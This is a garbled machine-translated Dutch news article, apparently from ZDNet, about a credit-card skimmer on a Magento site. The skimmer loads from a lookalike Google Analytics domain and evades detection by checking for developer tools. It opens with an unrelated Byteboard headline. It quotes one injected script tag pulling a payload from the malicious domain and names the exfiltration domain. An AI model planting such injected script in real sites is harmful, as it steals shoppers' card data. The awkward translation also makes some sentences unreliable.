Google Byteboard wil nemen van de pijn van het huren voor managers en kandidaten
De experimentele tool is bedoeld om te helpen bij het maken van het vinden van een nieuwe programmeur een beetje makkelijker.
Dreigingen zijn met behulp van valse, maar overtuigende Google-domeinen te gek bezoekers van de website in het denken van geïnfecteerde websites veilig zijn bij het maken van online transacties.
Op donderdag onderzoekers van Sucuri zei in een recent geval gemeld door een Magento website-eigenaar, een domein waren geïnfecteerd met een creditcard skimmer gebruik te maken van JavaScript-code met daarin een link om de schadelijke geïnternationaliseerde google-analytîcs[.]com-adres van de website.
Een voorbeeld van de code onderaan:
< script type=” text/javascript ” src =” //google-analytîcs.com/www.[bewerkt].com/3f5cf4657d5d9.js ” > < /script>
“Bezoekers van de Website kunnen een gerenommeerde naam (“Google”) in verzoeken en stel dat ze veilig zijn om te laden, zonder het te merken dat het domein is niet een perfecte match en is eigenlijk kwaadaardig van aard zijn,” zeggen de onderzoekers.
TechRepublic: 60% van de bedrijven ervaren aanvallen van binnenuit in het laatste jaar
De eigenaar van de website was zich bewust van een probleem na de zwarte lijst. Sucuri bleek uit het onderzoek door het vastleggen van gegevens-element van de kaart skimmer is vergelijkbaar met anderen in het wild en Javascript gebruikt om heimelijk sifon en opslaan van alle ingevoerde gegevens alsmede drop-down menu selecties.
Echter, de code zal veranderen tactiek, afhankelijk van of de developer tools in de Google Chrome of Mozilla Firefox-browser worden gebruikt. De skimmer wordt niet probeert te grijpen alle informatie in deze scenario ‘ s, die waarschijnlijk een poging om detectie te voorkomen.
CNET: Rusland gerichte verkiezingen systemen in alle 50 staten van de vs, de Senaat rapport zegt
De kaart skimmer ondersteunt “tientallen” van betaling gateways, Sucuri zegt, en als developer tools zijn niet gevonden, gestolen informatie wordt verzonden naar een externe server — weer vermomd met een andere frauduleuze domein, google[.]ssl – [.]lnfo[.]cc.
Zie ook: ONS AG Barr eisen tech bedrijven break-codering, ‘het kan en moet gedaan worden’
Kaart skimmers, geïnstalleerd door middel van kwetsbare e-commerce websites, zijn een veelvuldig voor. In juli, RiskIQ zei een recente ‘spray-and-pray’ – campagne was een succes voor de Magecart hacken van de groep, die had weten te infecteren meer dan 17.000 websites met kaart-skimming malware in slechts een paar maanden.
Magento gebruikers, op dezelfde manier als WordPress en Drupal, zijn altijd geadviseerd om hun software bouwt up-to-date is. Magento domeinen zijn van een gemeenschappelijke doelstelling van cyberattackers zoeken om te oogsten financiële gegevens, met een geschatte 83 procent van Magento websites gerapporteerd als kwetsbaar voor skimmers in 2018.
ZDNet heeft bereikt uit Google en zal updaten als we horen terug.
Vorige en aanverwante dekking
Google verwijdert stalker, spyware apps uit Play Store
Meer dan 23 miljoen gestolen creditcards worden verhandeld op de Donkere Web
Het UK, de EU politie pilot te geven eigenzinnige tiener hackers witte hoeden
Een tip? Get in touch veilig via WhatsApp | Signaal op +447713 025 499, of over Keybase: charlie0
Verwante Onderwerpen:
Beveiliging TV
Data Management
CXO
Datacenters